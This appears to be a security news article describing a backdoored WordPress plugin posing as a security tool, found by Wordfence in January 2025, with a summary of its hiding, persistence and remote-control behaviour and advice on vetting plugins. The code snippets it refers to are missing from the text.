Hidden Threat Behind a Fake Security Tool: WordPress Plugin Malware Takes Full Control of Your Site
WordPress is one of the most popular platforms for building websites, powering millions of sites worldwide due to its ease of use and extensive customization options. However, its widespread adoption also makes it a prime target for cybersecurity threats. A recently discovered piece of malware serves as a stark example of these risks.
On January 22, 2025, security researchers at Wordfence uncovered dangerous code within what appeared to be a legitimate security plugin during a routine analysis. Named innocuously as WP-antymalwary-bot.php or wp-performance-booster.php, the plugin conceals malicious functions capable of granting attackers complete control over a website.
Far from being a benign security tool, this plugin acts as a hidden backdoor, providing hackers with a range of dangerous capabilities, including:
- Executing arbitrary code remotely.
- Granting administrator privileges.
- Injecting malicious JavaScript for serving unwanted advertisements or other fraudulent activities.
One of the plugin’s most alarming features is its ability to persist on a site even after apparent removal. It achieves this by modifying the wp-cron.php file, a core WordPress component responsible for automated tasks, to reinstall itself whenever it is deleted. As a result, administrators may believe they’ve eliminated the threat, only for it to reappear covertly.
The plugin further evades detection by hiding itself from the WordPress admin dashboard’s plugin list, rendering it invisible to unsuspecting users. This is accomplished through the following code:
Additionally, the plugin includes an emergency login function that bypasses standard authentication. By using a specific query parameter, attackers can gain administrator access without alerting the site owner, as shown in this code snippet:
The malicious plugin communicates with a Command and Control (C&C) server every minute, sending the infected site’s URL and a timestamp. This allows hackers to maintain an up-to-date inventory of compromised sites and orchestrate simultaneous attacks across their network. Notably, the C&C server is believed to be located in Cyprus.
Upon identifying this threat, Wordfence promptly developed detection signatures and released them to premium users on January 24, 2025. Users of the free version are scheduled to receive this protection by May 23, 2025.
Many website owners assume that installing a “security plugin” guarantees safety. However, this incident underscores that even plugins marketed as protective can harbor serious threats.
For this reason, it’s critical to thoroughly vet any plugin before installation, checking its source, reviews, update history, and user feedback. Regular security scans and diligent monitoring of critical files should become standard practice for every website owner.
